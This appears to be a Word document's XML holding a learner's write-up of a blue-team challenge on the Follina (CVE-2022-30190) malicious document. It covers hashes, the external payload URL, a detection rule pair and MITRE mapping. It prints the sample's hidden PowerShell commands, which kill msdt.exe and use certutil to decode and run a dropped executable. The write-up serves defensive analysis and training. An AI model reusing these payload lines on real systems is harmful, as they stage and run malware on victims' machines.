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DA80" w14:textId="77777777" w:rsidR="00843E43" w:rsidRPr="00843E43" w:rsidRDefault="00843E43" w:rsidP="00843E43">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://blueteamlabs.online/home/challenge/follina-f1a3452f34"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CCA90" w14:textId="52EBC8F0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>On a Friday evening when you were in a mood to celebrate your weekend, your team was alerted with a new RCE vulnerability actively being exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5F8A7" w14:textId="77777777" w:rsidR="00843E43" w:rsidRPr="00843E43" w:rsidRDefault="00843E43" w:rsidP="00843E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3E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13066A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On a Friday evening when you were in a mood to celebrate your weekend, your team was alerted with a new RCE vulnerability actively being exploited in the wild. You have been tasked with analyzing and researching the sample to collect information for the weekend team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC84237" w14:textId="484314E8" w:rsidR="00843E43" w:rsidRDefault="000B3B1F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85D4B5" wp14:editId="473A9912">
            <wp:extent cx="5731510" cy="3277235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3509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0360" name="Picture 35096036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E43" w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Question 1)</w:t>
      </w:r>
      <w:r w:rsidR="00843E43" w:rsidRPr="00843E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the SHA1 hash value of the sample? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D61B6" w14:textId="0C04CEAB" w:rsidR="000B3B1F" w:rsidRPr="000B3B1F" w:rsidRDefault="000B3B1F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F7937D6" wp14:editId="2C71C5C1">
            <wp:extent cx="5731510" cy="2599690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14292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54449" w14:textId="5C1378F3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0B3B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0B3B1F" w:rsidRPr="000B3B1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>06727ffda60359236a8029e0b3e8a0fd11c23313</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD058F5" w14:textId="5D79EC87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2) According to VirusTotal, what is the full filetype of the provided sample? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F3782" w14:textId="2844319F" w:rsidR="000B3B1F" w:rsidRPr="000B3B1F" w:rsidRDefault="000B3B1F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B306552" wp14:editId="7C5BEBE0">
            <wp:extent cx="5731510" cy="2720975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="2159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25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ADBE" w14:textId="639DDCE8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0B3B1F" w:rsidRPr="000B3B1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B3B1F" w:rsidRPr="000B3B1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Office Open XML Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7637E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D53BF" w14:textId="5F4E8FAA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3) Extract the URL that is used within the sample and submit it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C3EFA" w14:textId="7C4B9BC8" w:rsidR="00393EF4" w:rsidRPr="00393EF4" w:rsidRDefault="00393EF4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BA43C3E" wp14:editId="307F8648">
            <wp:extent cx="5731510" cy="1913255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="61728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82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0D7F" w14:textId="77777777" w:rsidR="000B3B1F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945"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B3B1F" w:rsidRPr="000B3B1F" w14:paraId="0F6F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1900A" w14:textId="77777777" w:rsidR="000B3B1F" w:rsidRPr="000B3B1F" w:rsidRDefault="000B3B1F" w:rsidP="000B3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2CF8D60" w14:textId="3D8A82D2" w:rsidR="000B3B1F" w:rsidRPr="000B3B1F" w:rsidRDefault="00393EF4" w:rsidP="000B3B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8" w:history="1">
              <w:r w:rsidRPr="000B3B1F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https://www.xmlformats.com/office/word/2022/wordprocessingDrawing/</w:t>
              </w:r>
              <w:r w:rsidRPr="00782BE6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 xml:space="preserve">  </w:t>
              </w:r>
              <w:r w:rsidRPr="00782BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="00782BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="00782BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">   </w:t>
              </w:r>
              <w:r w:rsidRPr="000B3B1F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 xml:space="preserve">RDF842l.html </w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B303F8A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F84EB6" w14:textId="63EA47A5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4) What is the name of the XML file that is storing the extracted URL? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703482B5" w14:textId="58A4C544" w:rsidR="00702D24" w:rsidRPr="00702D24" w:rsidRDefault="00702D24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02D24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this URL is e a Word document structure,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702D24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n Office Open XML documents, external links are typically stored in the word/_rels/document.xml.rels file. That’s the XML file responsible for holding relationship data, including hyperlinks and external resource references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B84B45" w14:textId="4B0ABF9A" w:rsidR="00702D24" w:rsidRPr="00702D24" w:rsidRDefault="00702D24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665428C" wp14:editId="3AA9DDA7">
            <wp:extent cx="5731510" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="117324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417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1836" w14:textId="283DA1AD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702D2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proofErr w:type="gramStart"/>
      <w:r w:rsidR="00702D24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D861B4D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92F428" w14:textId="2DCB6B72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5) The extracted URL accesses a HTML file that triggers the vulnerability to execute a malicious payload. According to the HTML processing functions, any files with fewer than &lt;Number&gt; bytes would not invoke the payload. Submit the &lt;Number&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99ABD8" w14:textId="4A0FF818" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0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From the analysis of John Hammond on Huntress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7AC48" w14:textId="7C5ADBA3" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0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4A8FDEA" wp14:editId="528309BF">
            <wp:extent cx="5731510" cy="2694305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="97992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257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5FFC0" w14:textId="3BCA73AD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1615F0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4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D5F19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38C951" w14:textId="6FE5BA78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6) After execution, the sample will try to kill a process if it is already running. What is the name of this process? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451B7D1" w14:textId="77777777" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0" w:rsidP="001615F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001615F0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$cmd = "c:\windows\system32\cmd.exe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05740A" w14:textId="77777777" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0" w:rsidP="001615F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001615F0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4241766E" w14:textId="77777777" w:rsidR="001615F0" w:rsidRDefault="001615F0" w:rsidP="001615F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001615F0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&amp;&amp;for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&amp;&amp;findstr TVNDRgAAAA 1.rar&gt;1.t&amp;&amp;certutil -decode 1.t 1.c &amp;&amp;expand 1.c -F:* .&amp;&amp;rgb.exe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1717E8E3" w14:textId="5DC6711D" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0" w:rsidP="001615F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As we can see</w:t>
      </w:r>
      <w:r w:rsidR="00140113">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the sample will try to kill msdt.exe if it is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD6DD05" w14:textId="77777777" w:rsidR="001615F0" w:rsidRPr="001615F0" w:rsidRDefault="001615F0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8850AD" w14:textId="39C20E23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14011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msdt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD4837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739BB" w14:textId="5B2F876D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7) You were asked to write a process-based detection rule using Windows Event ID 4688. What would be the ProcessName and ParentProcessname used in this detection rule? [Hint: OSINT time!] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8D73E1" w14:textId="0EB29D36" w:rsidR="00C635A5" w:rsidRPr="00C635A5" w:rsidRDefault="00C635A5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attacker will create msdt.exe under the parent process WINWORD.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC14B52" w14:textId="1DED5224" w:rsidR="00C635A5" w:rsidRPr="00C635A5" w:rsidRDefault="00C635A5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474EF25" wp14:editId="00BA1024">
            <wp:extent cx="5731510" cy="2673985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="161640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06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3CE4C" w14:textId="0F48E38A" w:rsidR="00C635A5" w:rsidRPr="00C635A5" w:rsidRDefault="00C635A5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A4DD4DC" wp14:editId="0FB40776">
            <wp:extent cx="5731510" cy="4359275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="164626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624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16B7" w14:textId="22352381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C635A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msdt.exe, WINWORD.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8071A7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2628C5" w14:textId="496B47EC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8) Submit the MITRE technique ID used by the sample for Execution [Hint: Online sandbox platforms can help!] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2A6A1" w14:textId="39D70CEB" w:rsidR="002769C2" w:rsidRPr="002769C2" w:rsidRDefault="002769C2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Because the sample create msdt.exe under WINWORD.EXE, </w:t>
      </w:r>
      <w:r w:rsidR="00B733F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we can say that this is inter-process communication </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CBF35" w14:textId="2D4D8184" w:rsidR="002769C2" w:rsidRPr="002769C2" w:rsidRDefault="002769C2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16E7115" wp14:editId="54F4FB15">
            <wp:extent cx="3000375" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="19619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961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DD6" w14:textId="68349ACB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2769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T1559</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DC92B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2EFA66" w14:textId="33B31515" w:rsid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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 9) Submit the CVE associated with the vulnerability that is being exploited </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9BA15" w14:textId="05027848" w:rsidR="002769C2" w:rsidRPr="002769C2" w:rsidRDefault="002769C2" w:rsidP="00843E4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ACD1243" wp14:editId="57AE8C27">
            <wp:extent cx="5731510" cy="2988945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="111943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434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D8CC6" w14:textId="1EE46FA8" w:rsidR="00843E43" w:rsidRPr="00843E43" w:rsidRDefault="00843E43" w:rsidP="00843E4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43E43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Answers:</w:t>
      </w:r>
      <w:r w:rsidR="002769C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CVE-2022-30190</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D57E5D" w14:textId="77777777" w:rsidR="00843E43" w:rsidRPr="00843E43" w:rsidRDefault="00843E43" w:rsidP="00843E4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4A7ADC" w14:textId="77777777" w:rsidR="000374AE" w:rsidRDefault="000374AE"/>
    <w:sectPr w:rsidR="000374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E43"/>
    <w:rsid w:val="000374AE"/>
    <w:rsid w:val="000B3B1F"/>
    <w:rsid w:val="00140113"/>
    <w:rsid w:val="001615F0"/>
    <w:rsid w:val="002769C2"/>
    <w:rsid w:val="002D0708"/>
    <w:rsid w:val="00321272"/>
    <w:rsid w:val="00393EF4"/>
    <w:rsid w:val="00702D24"/>
    <w:rsid w:val="00843E43"/>
    <w:rsid w:val="00A74F2D"/>
    <w:rsid w:val="00B733F6"/>
    <w:rsid w:val="00C63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C9AE14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AEE74A61-3BDB-480F-9561-025A665A5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E43"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00843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E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3E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3E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mlformats.com/office/word/2022/wordprocessingDrawing/%20%20%20%20%20%20%20RDF842l.html%20" TargetMode="External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Son Tran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anh Son Tran</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-15T03:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-15T05:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>